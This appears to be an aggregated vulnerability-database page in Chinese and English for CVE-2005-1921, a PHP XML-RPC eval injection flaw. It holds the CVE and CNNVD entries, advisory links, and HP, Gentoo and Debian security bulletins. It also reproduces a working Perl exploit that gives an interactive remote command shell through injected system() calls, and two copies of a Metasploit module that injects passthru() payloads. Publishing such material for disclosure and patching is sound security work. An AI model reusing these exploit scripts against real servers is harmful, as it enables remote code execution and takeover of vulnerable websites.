CVE-2005-1921
CVSS7.5
发布时间 :2005-07-05 00:00:00
修订时间 :2016-10-17 23:23:18
NMCOEPS    

[原文]Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1 and earlier, as used in products such as (1) WordPress, (2) Serendipity, (3) Drupal, (4) egroupware, (5) MailWatch, (6) TikiWiki, (7) phpWebSite, (8) Ampache, and others, allows remote attackers to execute arbitrary PHP code via an XML file, which is not properly sanitized before being used in an eval statement.


[CNNVD]XML-RPC/PHP-XMLRPC 代码注入漏洞(CNNVD-200507-011)

        PEAR XML_RPC及PHPXMLRPC是在较多网站应用系统中使用的功能模块。
        PEAR XML_RPC 1.3.0及之前版本(也称为XML-RPC或xmlrpc)以及PHPXMLRPC (也称为XML-RPC For PHP或php-xmlrpc) 1.1及之前版本中存在代码注入漏洞。
        由于在使用文件前没有进行适当的检验处理,远程攻击者可通过XML文件,利用此漏洞执行任意PHP代码。
        多个使用这些模块的产品,包括WordPress, Serendipity,Drupal,egroupware, MailWatch, TikiWiki, phpWebSite, Ampache等均受此漏洞影响。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:pear:xml_rpc:1.0.4
cpe:/a:pear:xml_rpc:1.2.2
cpe:/a:pear:xml_rpc:1.3.0rc1
cpe:/a:pear:xml_rpc:1.0.3
cpe:/a:pear:xml_rpc:1.2.0rc2
cpe:/a:pear:xml_rpc:1.2.1
cpe:/a:pear:xml_rpc:1.3.0rc2
cpe:/a:pear:xml_rpc:1.2.0rc3
cpe:/a:pear:xml_rpc:1.2.0rc6
cpe:/a:pear:xml_rpc:1.0.2
cpe:/a:pear:xml_rpc:1.2.0
cpe:/a:pear:xml_rpc:1.2.0rc1
cpe:/a:pear:xml_rpc:1.3.0rc3
cpe:/a:pear:xml_rpc:1.1.0
cpe:/a:pear:xml_rpc:1.2.0rc4
cpe:/a:pear:xml_rpc:1.2.0rc7
cpe:/a:pear:xml_rpc:1.2.0rc5

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:350PEAR XML_RPC PHP Code Execution Vulnerability
oval:org.mitre.oval:def:11294Eval injection vulnerability in PEAR XML_RPC 1.3.0 and earlier (aka XML-RPC or xmlrpc) and PHPXMLRPC (aka XML-RPC For PHP or php-xmlrpc) 1.1...
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1921
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1921
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200507-011
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112008638320145&w=2
(UNKNOWN)  BUGTRAQ  20050629 Advisory 02/2005: Remote code execution in Serendipity
http://marc.info/?l=bugtraq&m=112015336720867&w=2
(UNKNOWN)  BUGTRAQ  20050629 [DRUPAL-SA-2005-003] Drupal 4.6.2 / 4.5.4 fixes critical XML-RPC issue
http://marc.info/?l=bugtraq&m=112605112027335&w=2
(UNKNOWN)  SUSE  SUSE-SA:2005:051
http://pear.php.net/package/XML_RPC/download/1.3.1
(PATCH)  MISC  http://pear.php.net/package/XML_RPC/download/1.3.1
http://security.gentoo.org/glsa/glsa-200507-01.xml
(UNKNOWN)  GENTOO  GLSA-200507-01
http://security.gentoo.org/glsa/glsa-200507-06.xml
(UNKNOWN)  GENTOO  GLSA-200507-06
http://security.gentoo.org/glsa/glsa-200507-07.xml
(UNKNOWN)  GENTOO  GLSA-200507-07
http://securitytracker.com/id?1015336
(UNKNOWN)  SECTRACK  1015336
http://sourceforge.net/project/showfiles.php?group_id=87163
(UNKNOWN)  CONFIRM  http://sourceforge.net/project/showfiles.php?group_id=87163
http://sourceforge.net/project/shownotes.php?release_id=338803
(UNKNOWN)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=338803
http://www.ampache.org/announce/3_3_1_2.php
(UNKNOWN)  CONFIRM  http://www.ampache.org/announce/3_3_1_2.php
http://www.debian.org/security/2005/dsa-745
(UNKNOWN)  DEBIAN  DSA-745
http://www.debian.org/security/2005/dsa-746
(UNKNOWN)  DEBIAN  DSA-746
http://www.debian.org/security/2005/dsa-747
(UNKNOWN)  DEBIAN  DSA-747
http://www.debian.org/security/2005/dsa-789
(UNKNOWN)  DEBIAN  DSA-789
http://www.drupal.org/security/drupal-sa-2005-003/advisory.txt
(UNKNOWN)  CONFIRM  http://www.drupal.org/security/drupal-sa-2005-003/advisory.txt
http://www.gulftech.org/?node=research&article_id=00087-07012005
(VENDOR_ADVISORY)  MISC  http://www.gulftech.org/?node=research&article_id=00087-07012005
http://www.hardened-php.net/advisory-022005.php
(VENDOR_ADVISORY)  MISC  http://www.hardened-php.net/advisory-022005.php
http://www.mandriva.com/security/advisories?name=MDKSA-2005:109
(VENDOR_ADVISORY)  MANDRAKE  MDKSA-2005:109
http://www.novell.com/linux/security/advisories/2005_18_sr.html
(UNKNOWN)  SUSE  SUSE-SR:2005:018
http://www.novell.com/linux/security/advisories/2005_41_php_pear.html
(UNKNOWN)  SUSE  SUSE-SA:2005:041
http://www.novell.com/linux/security/advisories/2005_49_php.html
(UNKNOWN)  SUSE  SUSE-SA:2005:049
http://www.redhat.com/support/errata/RHSA-2005-564.html
(UNKNOWN)  REDHAT  RHSA-2005:564
http://www.securityfocus.com/archive/1/archive/1/419064/100/0/threaded
(UNKNOWN)  HP  HPSBTU02083
http://www.securityfocus.com/bid/14088
(UNKNOWN)  BID  14088
http://www.vupen.com/english/advisories/2005/2827
(UNKNOWN)  VUPEN  ADV-2005-2827

- 漏洞信息

XML-RPC/PHP-XMLRPC 代码注入漏洞
高危 输入验证
2005-07-05 00:00:00 2005-10-20 00:00:00
远程  
        PEAR XML_RPC及PHPXMLRPC是在较多网站应用系统中使用的功能模块。
        PEAR XML_RPC 1.3.0及之前版本(也称为XML-RPC或xmlrpc)以及PHPXMLRPC (也称为XML-RPC For PHP或php-xmlrpc) 1.1及之前版本中存在代码注入漏洞。
        由于在使用文件前没有进行适当的检验处理,远程攻击者可通过XML文件,利用此漏洞执行任意PHP代码。
        多个使用这些模块的产品,包括WordPress, Serendipity,Drupal,egroupware, MailWatch, TikiWiki, phpWebSite, Ampache等均受此漏洞影响。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://pear.php.net/package/XML_RPC/download/
        http://sourceforge.net/projects/phpxmlrpc/files/

- 漏洞信息 (1078)

XML-RPC Library <= 1.3.0 (xmlrpc.php) Remote Code Injection Exploit (EDBID:1078)
php webapps
2005-07-01 Verified
0 ilo--
N/A [点击下载]
# tested and working /str0ke

#!/usr/bin/perl
# 
#  ilo-- 
#
#  This program is no GPL or has nothing to do with FSF, but some
#  code was ripped from romansoft.. sorry, too lazy!
#  
#  xmlrpc bug by James from GulfTech Security Research. 
#  http://pear.php.net/bugs/bug.php?id=4692
#  xmlrpc drupal exploit, but James sais xoops, phpnuke and other
#  cms should be vulnerable.
#
#  greets: dsr! digitalsec.net
#
require LWP::UserAgent;
use URI;
use Getopt::Long;
use strict;
$| = 1;  # fflush stdout after print

# Default options
# connection 
my $basic_auth_user = '';
my $basic_auth_pass = '';
my $proxy = '';
my $proxy_user = '';
my $proxy_pass = '';
my $conn_timeout = 15;

# general
my $host;
 
 #informational lines to feed my own ego.
 print "xmlrpc exploit - http://www.reversing.org \n";
 print "2005 ilo-- <ilo".chr(64)."reversing.org> \n";
 print "special chars allowed are / and - \n\n";

 # read command line options
 my $options = GetOptions (

 #general options
 'host=s'    => \$host, # input host to test.

 # connection options
 'basic_auth_user=s' => \$basic_auth_user,
 'basic_auth_pass=s' => \$basic_auth_pass,
 'proxy=s'           => \$proxy,
 'proxy_user=s'      => \$proxy_user,
 'proxy_pass=s'      => \$proxy_pass,
 'timeout=i'         => \$conn_timeout);

 # command line sanity check 
 &show_usage unless ($host);

 # main loop 
 while (1){
 	print "\nxmlrpc@# ";
 	my $cmd = <STDIN>;
 	xmlrpc_xploit ($cmd);
 }

 exit (1);

#exploit 
sub xmlrpc_xploit {
chomp (my $data = shift);
my $reply;

my $d1 = "<?xml version=\"1.0\"?><methodCall><methodName>examples.getStateName</methodName><params><param><name>a');";  
my $d2 = ";//</name><value>xml exploit R/01</value></param></params></methodCall>";

  $data =~ s/-/'.chr(45).'/mg;
  $data =~ s/\//'.char(47).'/mg;

  my $req = new HTTP::Request 'POST' => $host;
  $req->content_type('application/xml');
  $req->content($d1.'system(\''.$data.'\')'.$d2);
  
  my $ua = new LWP::UserAgent;
  $ua->agent("xmlrpc exploit R/0.1");
  $ua->timeout($conn_timeout);

  if ($basic_auth_user){
    $req->authorization_basic($basic_auth_user, $basic_auth_pass) 
  }
  if ($proxy){
    $ua->proxy(['http'] => $proxy);
    $req->proxy_authorization_basic($proxy_user, $proxy_pass);
  }
 
  #send request, return null if not OK
  my $res = $ua->request($req);
  if ($res->is_success){
     $reply= $res->content;
  } else { 
     $reply = "";
  }
  $reply =~ /(.*).(<pre>warning.*)/mgsi;
  print ($1);
}

# show options 
sub show_usage {
  print "Syntax: ./xmlrpc.pl [options] host/uri\n\n";
  print "main options\n";
  print "connection options\n";
  print "\t--proxy (http), --proxy_user, --proxy_pass\n";
  print "\t--basic_auth_user, --basic_auth_pass\n";
  print "\t--timeout \n";
  print "\nExample\n";
  print "bash# xmlrpc.pl --host=http://www.host.com/xmlrpc.php \n";
  print "\n";
  exit(1);
}


# milw0rm.com [2005-07-01]
		

- 漏洞信息 (16882)

PHP XML-RPC Arbitrary Code Execution (EDBID:16882)
php webapps
2010-07-25 Verified
0 metasploit
N/A [点击下载]
##
# $Id: php_xmlrpc_eval.rb 9929 2010-07-25 21:37:54Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	# XXX This module needs an overhaul
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'PHP XML-RPC Arbitrary Code Execution',
			'Description'    => %q{
					This module exploits an arbitrary code execution flaw
				discovered in many implementations of the PHP XML-RPC module.
				This flaw is exploitable through a number of PHP web
				applications, including but not limited to Drupal, Wordpress,
				Postnuke, and TikiWiki.
			},
			'Author'         => [ 'hdm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9929 $',
			'References'     =>
				[
					['CVE', '2005-1921'],
					['OSVDB', '17793'],
					['BID', '14088'],
				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'solaris'],
			'Payload'        => {
					'Space' => 512,
					'DisableNops' => true,
					'Keys'  => ['cmd', 'cmd_bash'],
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 29 2005'
			))


		register_options(
			[
				OptString.new('PATH', [ true,  "Path to xmlrpc.php", '/xmlrpc.php']),
			], self.class)

		deregister_options(
			'HTTP::junk_params', # not your typical POST, so don't inject params.
			'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
			)
	end

	def go(command)

		encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
		wrapper = rand_text_alphanumeric(rand(128)+32)

		cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"

		xml =
		'<?xml version="1.0"?>' +
		"<methodCall>" +
			"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
			"<params><param>" +
				"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
				"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
			"</param></params>" +
		"</methodCall>";

		res = send_request_cgi({
				'uri'          => datastore['PATH'],
				'method'       => 'POST',
				'ctype'        => 'application/xml',
				'data'         => xml,
			}, 5)

		if (res and res.body)
			b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
			if b
				return b.captures[0]
			elsif datastore['HTTP::chunked'] == true
				b = /chunked Transfer-Encoding forbidden/.match(res.body)
				if b
					raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
				end
			end
		end

		return nil
	end

	def check
		response = go("echo ownable")
		if (!response.nil? and response =~ /ownable/sm)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		response = go(payload.encoded)
		if response == nil
			print_error('exploit failed: no response')
		else
			if response.length == 0
				print_status('exploit successful')
			else
				print_status("Command returned #{response}")
			end
			handler
		end
	end
end
		

- 漏洞信息 (F82366)

PHP XML-RPC Arbitrary Code Execution (PacketStormID:F82366)
2009-10-30 00:00:00
H D Moore,cazz  metasploit.com
exploit,web,arbitrary,php,code execution
CVE-2005-1921
[点击下载]

This Metasploit module exploits an arbitrary code execution flaw discovered in many implementations of the PHP XML-RPC module. This flaw is exploitable through a number of PHP web applications, including but not limited to Drupal, Wordpress, Postnuke, and TikiWiki.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpClient

	# XXX This module needs an overhaul
	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'PHP XML-RPC Arbitrary Code Execution',
			'Description'    => %q{
				This module exploits an arbitrary code execution flaw
				discovered in many implementations of the PHP XML-RPC module.
				This flaw is exploitable through a number of PHP web
				applications, including but not limited to Drupal, Wordpress,
				Postnuke, and TikiWiki.
			},
			'Author'         => [ 'hdm', 'cazz' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2005-1921'],
					['OSVDB', '17793'],
					['BID', '14088'],
				],
			'Privileged'     => false,
			'Platform'       => ['unix', 'solaris'],
			'Payload'        => {
					'Space' => 512,
					'DisableNops' => true,
					'Keys'  => ['cmd', 'cmd_bash'],
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 29 2005'
			))


		register_options(
			[
				OptString.new('PATH', [ true,  "Path to xmlrpc.php", '/xmlrpc.php']),
			], self.class
			)
	
		deregister_options(
			'HTTP::junk_params', # not your typical POST, so don't inject params.
			'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now. 
			)
	end

	def go(command)

		encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
		wrapper = rand_text_alphanumeric(rand(128)+32)
		
		cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"

		xml = 
		'<?xml version="1.0"?>' +
		"<methodCall>" +
			"<methodName>"+ rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
			"<params><param>" +
				"<name>" + rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
				"<value>" + rand_text_alphanumeric(rand(128)+32) + "</value>" +
			"</param></params>" +
		"</methodCall>";

		res = send_request_cgi({
			'uri'          => datastore['PATH'],
			'method'       => 'POST',
			'ctype'        => 'application/xml',
			'data'         => xml,
		}, 5)


		if (res and res.body)
			b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
			if b
				return b.captures[0]
			elsif datastore['HTTP::chunked'] == true
				b = /chunked Transfer-Encoding forbidden/.match(res.body)
				if b
					raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
				end
			end
		end

		return nil
	end
	
	def check
		response = go("echo ownable")
		if (!response.nil? and response =~ /ownable/sm)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		response = go(payload.encoded)
		if response == nil
			print_status('exploit failed')
		else
			if response.length == 0
				print_status('exploit successful')
			else 
				print_status("Command returned #{response}")
			end
			handler
		end
	end
end

    

- 漏洞信息 (F42260)

HP Security Bulletin 2005-10.69 (PacketStormID:F42260)
2005-12-14 00:00:00
Hewlett Packard  hp.com
advisory,remote,web,arbitrary,php
unix
CVE-2005-1921
[点击下载]

HP Security Bulletin - A potential security vulnerability has been identified in the Secure Web Server for Tru64 UNIX (powered by Apache) 6.4.1 and earlier when running PHP/XMLRPC. The vulnerability could be exploited by a remote unauthorized user to execute arbitrary code.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00576921
Version: 1

HPSBTU02083 SSRT051069 - HP Tru64 Unix Secure Web Server
(SWS 6.4.1 and earlier) PHP/XMLRPC Remote Unauthorized Execution
of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted
upon as soon as possible.

Release Date: 2005-12-06
Last Updated: 2005-12-07

Potential Security Impact: Remote unauthorized execution of
arbitrary code

Source: Hewlett-Packard Company,
        HP Software Security Response Team

VULNERABILITY SUMMARY

A potential security vulnerability has been identified in the
Secure Web Server for Tru64 UNIX (powered by Apache) 6.4.1 and
earlier when running PHP/XMLRPC. The vulnerability could be
exploited by a remote unauthorized user to execute arbitrary code.

References: CAN-2005-1921

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
The following supported versions of HP Tru64 UNIX are affected
when running the Secure Web Server 6.4.1 and earlier:

    * HP Tru64 UNIX Version 5.1B-3
    * HP Tru64 UNIX Version 5.1B-2/PK4
    * HP Tru64 UNIX Version 5.1A PK6

BACKGROUND

RESOLUTION

HP has released Secure Web Server (SWS) 6.4.1a for Tru64 UNIX,
which addresses the potential vulnerability.

Note: The SWS 6.4.1a kit applies to HP Tru64 UNIX Versions 5.1B-3,
5.1B-2/PK4, and 5.1A PK6.

Kit Location: http://h30097.www3.hp.com/internet/download.htm

Kit File: sws_v6_4_1a.tar.gz

Kit MD5 Checksum: 3000048bb9e39b02e95628741f62e37b


UPDATE HISTORY
Initial release: 6 December 2005



Support: For further information, contact normal HP Services
support channel.

Report: To report a potential security vulnerability with any HP
supported product, send Email to: security-alert@hp.com.  It is
strongly recommended that security related information being
communicated to HP be encrypted using PGP, especially exploit
information.  To get the security-alert PGP key, please send an
e-mail message as follows:
  To: security-alert@hp.com
  Subject: get key

Subscribe: To initiate a subscription to receive future HP
Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&
langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC

On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
  - check ALL categories for which alerts are required and
    continue.
Under Step2: your ITRC operating systems
  - verify your operating system selections are checked and
    save.

To update an existing subscription:
http://h30046.www3.hp.com/subSignIn.php
Log in on the web page:
  Subscriber's choice for Business: sign-in.
On the web page:
  Subscriber's Choice: your profile summary
    - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin
relates to is represented by the 5th and 6th characters of the
Bulletin number in the title:

    GN = HP General SW,
    MA = HP Management Agents,
    MI = Misc. 3rd party SW,
    MP = HP MPE/iX,
    NS = HP NonStop Servers,
    OV = HP OpenVMS,
    PI = HP Printing & Imaging,
    ST = HP Storage SW,
    TL = HP Trusted Linux,
    TU = HP Tru64 UNIX,
    UX = HP-UX,
    VV = HP Virtual Vault


System management and security procedures must be reviewed
frequently to maintain system integrity. HP is continually
reviewing and enhancing the security features of software products
to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to
bring to the attention of users of the affected HP products the
important security information contained in this Bulletin. HP
recommends that all users determine the applicability of this
information to their individual situations and take appropriate
action. HP does not warrant that this information is necessarily
accurate or complete for all user situations and, consequently, HP
will not be responsible for any damages resulting from user's use
or disregard of the information provided in this Bulletin. To the
extent permitted by law, HP disclaims all warranties, either
express or implied, including the warranties of merchantability
and fitness for a particular purpose, title and non-infringement."


(c)Copyright 2005 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or
editorial errors or omissions contained herein. The information
provided is provided "as is" without warranty of any kind. To the
extent permitted by law, neither HP nor its affiliates,
subcontractors or suppliers will be liable for incidental, special
or consequential damages including downtime cost; lost profits;
damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration.
The information in this document is subject to change without
notice. Hewlett-Packard Company and the names of Hewlett-Packard
products referenced herein are trademarks of Hewlett-Packard
Company in the United States and other countries. Other product
and company names mentioned herein may be trademarks of their
respective owners.

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1

iQA/AwUBQ5mMSOAfOvwtKn1ZEQKQRQCfThhtyFCetsl1IJjzPS1uaKfjnWwAoKSN
bOm9SrnNUUmX+a+0+zTrjZwm
=QLat
-----END PGP SIGNATURE-----

    

- 漏洞信息 (F38732)

Gentoo Linux Security Advisory 200507-15 (PacketStormID:F38732)
2005-07-15 00:00:00
Gentoo  security.gentoo.org
advisory,php
linux,gentoo
CVE-2005-1921
[点击下载]

Gentoo Linux Security Advisory GLSA 200507-15 - James Bercegay has discovered that the XML-RPC implementation in PHP fails to sanitize input passed in an XML document, which is used in an eval() statement. Versions less than 4.4.0 are affected.

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enigB325CB57C9D88174F2A8C379
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200507-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: PHP: Script injection through XML-RPC
      Date: July 15, 2005
      Bugs: #97655
        ID: 200507-15

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

PHP includes an XML-RPC implementation which allows remote attackers to
execute arbitrary PHP script commands.

Background
==========

PHP is a general-purpose scripting language widely used to develop
web-based applications. It can run inside a web server using the
mod_php module or the CGI version of PHP, or can run stand-alone in a
CLI.

Affected packages
=================

    -------------------------------------------------------------------
     Package      /  Vulnerable  /                          Unaffected
    -------------------------------------------------------------------
  1  dev-php/php       < 4.4.0                                >= 4.4.0

Description
===========

James Bercegay has discovered that the XML-RPC implementation in PHP
fails to sanitize input passed in an XML document, which is used in an
"eval()" statement.

Impact
======

A remote attacker could exploit the XML-RPC vulnerability to execute
arbitrary PHP script code by sending specially crafted XML data to
applications making use of this XML-RPC implementation.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All PHP users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=dev-php/php-4.4.0"

References
==========

  [ 1 ] CAN-2005-1921
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1921

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200507-15.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0


--------------enigB325CB57C9D88174F2A8C379
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFC18dSvcL1obalX08RAirKAJ9e6l3+prKKeQ8Z4ifoSz4wwIMetACgjeUp
I5fGjBsrfbhrgax3PMwPHb4=
=MDiP
-----END PGP SIGNATURE-----

--------------enigB325CB57C9D88174F2A8C379--
    

- 漏洞信息 (F38673)

Debian Linux Security Advisory 746-1 (PacketStormID:F38673)
2005-07-14 00:00:00
Debian  security.debian.org
advisory,web,arbitrary
linux,debian
CVE-2005-1921
[点击下载]

Debian Security Advisory DSA 746-1 - A vulnerability had been identified in the xmlrpc library included with phpgroupware, a web-based application including email, calendar and other groupware functionality. This vulnerability could lead to the execution of arbitrary commands on the server running phpgroupware.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA 746-1                   security@debian.org
http://www.debian.org/security/                            Michael Stone
July 13, 2005                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : phpgroupware
Vulnerability  : remote command execution
Problem type   : input validation error
Debian-specific: no
CVE Id(s)      : CAN-2005-1921

A vulnerability had been identified in the xmlrpc library included with
phpgroupware, a web-based application including email, calendar and
other groupware functionality. This vulnerability could lead to the
execution of arbitrary commands on the server running phpgroupware.

The security team is continuing to investigate the version of
phpgroupware included with the old stable distribution (sarge). At this
time we recommend disabling phpgroupware or upgrading to the current
stable distribution (sarge).

For the current stable distribution (sarge) this problem has been fixed
in version 0.9.16.005-3.sarge0.

For the unstable distribution (sid) this problem has been fixed in
version 0.9.16.006-1.

We recommend that you upgrade your phpgroupware package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian 3.1 (sarge)
- ------------------

  sarge was released for alpha, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc.

  Source archives:

    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.005-3.sarge0.dsc
      Size/MD5 checksum:     1665 6b60af214470336fb8dd24d029ab6326
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.005-3.sarge0.diff.gz
      Size/MD5 checksum:    31814 f9f0fdb982212255037d4129736e7c21
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware_0.9.16.005.orig.tar.gz
      Size/MD5 checksum: 19442629 5edd5518e8f77174c12844f9cfad6ac4

  Architecture independent packages:

    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-ftp_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    35984 4a87585b9a1c5f7ac32cd6a7fb217242
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-admin_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   185894 c33f2c74c3df4d7ecaba47499adfcfc2
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-phpgwapi_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:  9674304 8f9bc38f2610d7aeeab769f6571f8ce6
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-infolog_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   135960 bbc1ca292006147f097cc79396de8808
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-registration_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    29534 ed73d7edab4ceae62b2b2bde8d279387
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-addressbook_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   176070 29005653b28191bc31f2f09b49e4b681
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-news-admin_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    40858 18b367628b687ae793281ddb6399aa0a
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-fudforum_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:  1355020 ebe912a08a7b8721d21b98b95cd0eda2
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-preferences_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    59198 f7d81622bd273a1bb7aa2ff227f2c007
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-nntp_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    46498 565979513780536ee9cc6573728cea48
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-sitemgr_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:   902042 fe53830690ad59fd3711b156260f39ad
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-chat_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    22760 d40b76c6cfde48dc863eb07fa68f618c
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-phpbrain_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    39746 0a0e1480285d96d2b9cf175df30284a8
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-phonelog_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    20272 f9b8d9bd93eb716f1ff689eea0307038
    http://security.debian.org/pool/updates/main/p/phpgroupware/phpgroupware-wiki_0.9.16.005-3.sarge0_all.deb
      Size/MD5 checksum:    69878 cafaf90a5c9053ba36614fd9140d2dec
